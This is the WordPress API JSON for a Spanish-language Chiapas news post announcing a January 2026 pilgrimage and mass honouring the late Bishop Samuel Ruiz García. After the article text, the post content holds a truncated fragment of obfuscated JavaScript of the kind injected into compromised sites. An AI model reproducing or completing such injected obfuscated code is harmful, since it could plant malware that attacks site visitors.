{"id":26087,"date":"2026-01-10T04:29:31","date_gmt":"2026-01-10T04:29:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=26087"},"modified":"2026-01-10T04:29:32","modified_gmt":"2026-01-10T04:29:32","slug":"pueblo-creyente-alista-caminata-por-el-aniversario-luctuoso-del-obispo-emerito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=26087","title":{"rendered":"Pueblo Creyente alista caminata por el aniversario luctuoso del obispo em\u00e9rito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"657\" height=\"500\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000537556.jpg\" alt=\"\" class=\"wp-image-26088\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000537556.jpg 657w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000537556-300x228.jpg 300w\" sizes=\"auto, (max-width: 657px) 100vw, 657px\" \/><\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<br>9 de enero del 2026. San Crist\u00f3bal de Las Casas.- Con motivo de un aniversario m\u00e1s del fallecimiento del obispo em\u00e9rito Samuel Ruiz Garc\u00eda, integrantes del Pueblo Creyente y autoridades eclesiales de la Di\u00f3cesis de esta ciudad convocaron a una peregrinaci\u00f3n que recorrer\u00e1 distintas vialidades de la ciudad el pr\u00f3ximo domingo 25 de enero.<\/p>\n\n\n\n<p>De acuerdo con la invitaci\u00f3n difundida, la movilizaci\u00f3n dar\u00e1 inicio a las 8 horas y partir\u00e1 desde dos puntos estrat\u00e9gicos. Uno de los contingentes saldr\u00e1 del oriente de la ciudad, a la altura del crucero San Pablo, sobre la salida hacia Teopisca, mientras que el segundo avanzar\u00e1 desde el poniente, sobre la carretera federal libre San Crist\u00f3bal\u2013Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los organizadores hicieron un llamado abierto a comunidades, parroquias, colectivos sociales y ciudadan\u00eda en general, as\u00ed como a feligreses provenientes de otros municipios del estado, entre ellos Tuxtla Guti\u00e9rrez y Tapachula, para sumarse a esta expresi\u00f3n p\u00fablica de fe, memoria y compromiso social.<\/p>\n\n\n\n<p>Como parte de las actividades programadas, a las 11:00 de la ma\u00f1ana se celebrar\u00e1 una eucarist\u00eda a un costado de la Catedral de San Crist\u00f3bal, ceremonia que ser\u00e1 encabezada por el obispo diocesano, Rodrigo Aguilar Mart\u00ednez, en recuerdo del legado pastoral y humanista de Ruiz Garc\u00eda.<\/p>\n\n\n\n<p>Finalmente, se exhort\u00f3 a las y los participantes a organizar su asistencia a trav\u00e9s de sus parroquias o zonas pastorales, con el objetivo de garantizar una participaci\u00f3n ordenada y el buen desarrollo de la peregrinaci\u00f3n.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsal9 de enero del 2026. San Crist\u00f3bal de Las Casas.- Con motivo de un aniversario m\u00e1s del fallecimiento del obispo em\u00e9rito Samuel Ruiz Garc\u00eda, integrantes del Pueblo Creyente y autoridades eclesiales de la Di\u00f3cesis de esta ciudad convocaron a una peregrinaci\u00f3n que recorrer\u00e1 distintas vialidades de la ciudad el pr\u00f3ximo domingo 25 de enero. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":26088,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-26087","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26087","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26087"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26087\/revisions"}],"predecessor-version":[{"id":26089,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/26087\/revisions\/26089"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/26088"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26087"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26087"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26087"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}